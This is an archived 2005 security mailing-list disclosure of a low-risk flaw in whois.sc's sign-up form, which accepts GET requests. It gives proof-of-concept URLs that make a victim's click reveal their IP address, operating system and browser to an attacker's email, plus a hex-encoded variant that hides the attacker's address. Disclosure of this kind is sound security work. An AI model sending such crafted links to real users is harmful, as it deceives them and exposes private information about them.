| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed Nov 2 20:01:21 2005 From: unknown.pentester at gmail.com (unknown unknown) Subject: whois.sc not-big-deal hole Title: whois.sc not-big-deal hole Server-side risk: none Client-side risk: low risk (private info revealed about the user) Description: This might not even be considered a proper security hole, but I thought it's an interesting way to get the following information about a user: - IP Address - Operating system - Web browser version This information can be easily obtained by "tricking" someone to visit your website and then checking the webserver logs. Email headers also help, not to mention loud OS detection tools such as xprobe2 and nmap (which will only work if you're lucky and the "victim" doesn't use a firewall blocking all incoming traffic). In this case however, the scenario is a little different because we use a sign-up service provided by an existing website for our own purposes (enumeration). The only limitation of this "trick" is that the attacker needs to use a different email address for each attack. This is because whois.sc will set the account activation status to "pending" after requesting the account activation with your email address for the first time. The original request to sign-up for an account is a POST request *similar* to the following: POST http://www.whois.sc/members/process.html HTTP/1.1 Host: www.whois.sc Content-Length: 48 action=newaccount&doneurl=&email=test%40test.com However we can change the request from POST to GET and the application will happily process the query: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com PoC: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com Replace "attacker%40evilmail.com" in the previous link with your own email address (e.g.: myself%40gmail.com) and send it to the "victim". Also, we could obsfucate our email address by encoding it to hex: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D Note: "%40" is "@" in hex. For a good resource to convert strings to different encodings check out http://www.thedumbterminal.co.uk/php/stringdecode.php Regards, pagvac Earth, SOLAR SYSTEM
Powered by blists - more mailing lists